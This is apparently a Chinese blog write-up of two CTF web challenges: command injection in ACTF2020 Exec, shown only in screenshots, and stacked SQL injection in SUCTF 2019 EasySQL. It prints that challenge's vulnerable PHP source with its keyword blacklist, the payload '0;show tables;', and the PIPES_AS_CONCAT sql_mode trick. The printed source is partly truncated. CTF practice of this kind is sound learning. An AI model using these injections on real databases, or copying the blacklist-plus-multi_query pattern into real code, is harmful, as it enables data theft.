[ACTF2020 新生赛]Exec

[ACTF2020 新生赛]Exec

正常输入一个ip地址进行ping操作,然后使用BP抓个包看看

[ACTF2020 新生赛]Exec_第1张图片

[ACTF2020 新生赛]Exec_第2张图片

先试试最常见的命令执行

[ACTF2020 新生赛]Exec_第3张图片

发现正常的回显了,可以利用 cat 的命令 Linux常用命令 查看 flag 文件。

[ACTF2020 新生赛]Exec_第4张图片

[ACTF2020 新生赛]Exec_第5张图片

[SUCTF 2019]EasySQL

抓个包看看

[ACTF2020 新生赛]Exec_第6张图片

初次测试,发现这里是存在 数字型注入 的,然后又发现很多的关键字都被过滤了

[ACTF2020 新生赛]Exec_第7张图片

[ACTF2020 新生赛]Exec_第8张图片

[ACTF2020 新生赛]Exec_第9张图片

最后发现,可以使用show,进行堆叠注入,但是发现 flag 和 from 也都被过滤掉了

[ACTF2020 新生赛]Exec_第10张图片

[ACTF2020 新生赛]Exec_第11张图片

[ACTF2020 新生赛]Exec_第12张图片

无奈的我就去找 writeup 了,有大佬文章直接给出了源码,发现过滤一大堆的关键字。


    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
    ?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

<?php

    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile
        			|readfile|where|from|union|update|delete|if|sleep|extractvalue|
    			    updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }
    
    ?>

发现过滤的字段中没有过滤 selectset ,而且接入的查询语句中是 “select “.$post[‘query’].”||flag from Flag”; 这样的。

# 输入的字符串
0;show tables;
# 拼接后的查询语句
select 0;show tables;select 1||flag from Flag;

这里的 逻辑或 || 并没有直接执行,根据文章中的说法,这里的 || 并没有作用,因此使用 set 命令修改一下sql的模式, sql_mode了解,sql_mode。

set sql_mode = PIPES_AS_CONCAT;
# 将"||"视为字符串的连接操作符 而不是 逻辑或运算符 和字符串的拼接函数concat()类似
# 设置完成后,再进行查询
set sql_mode = PIPES_AS_CONCAT;
select a||hello from c;
# 结果是:ahello
# 将 a 和 hello 拼接在一起,和concat('a','hello')一样

再使用堆叠进行查询

[ACTF2020 新生赛]Exec_第13张图片

# sql_mode常用值及描述
ONLY_FULL_GROUP_BY:对于GROUP BY聚合操作,如果在SELECT中的列,没有在GROUP BY中出现,那么这个SQL是不合法的,因为列不在GROUP BY从句中
NO_AUTO_VALUE_ON_ZERO:该值影响自增长列的插入。默认设置下,插入0NULL代表生成下一个自增长值。如果用户 希望插入的值为0,而该列又是自增长的,那么这个选项就有用了。
STRICT_TRANS_TABLES:在该模式下,如果一个值不能插入到一个事务表中,则中断当前的操作,对非事务表不做限制
NO_ZERO_IN_DATE:在严格模式下,不允许日期和月份为零
NO_ZERO_DATE:设置该值,mysql数据库不允许插入零日期,插入零日期会抛出错误而不是警告。
ERROR_FOR_DIVISION_BY_ZERO:在INSERTUPDATE过程中,如果数据被零除,则产生错误而非警告。如 果未给出该模式,那么数据被零除时MySQL返回NULL
NO_AUTO_CREATE_USER:禁止GRANT创建密码为空的用户。
NO_ENGINE_SUBSTITUTION:如果需要的存储引擎被禁用或未编译,那么抛出错误。不设置此值时,用默认的存储引擎替代,并抛出一个异常。
PIPES_AS_CONCAT:将 || 当作连接操作符使用,如concat() 函数的作用。
ANSI_QUOTES:启用ANSI_QUOTES后,不能用双引号来引用字符串,因为它被解释为识别符。

你可能感兴趣的:(#,buu练习记录,linux,web安全,网络安全)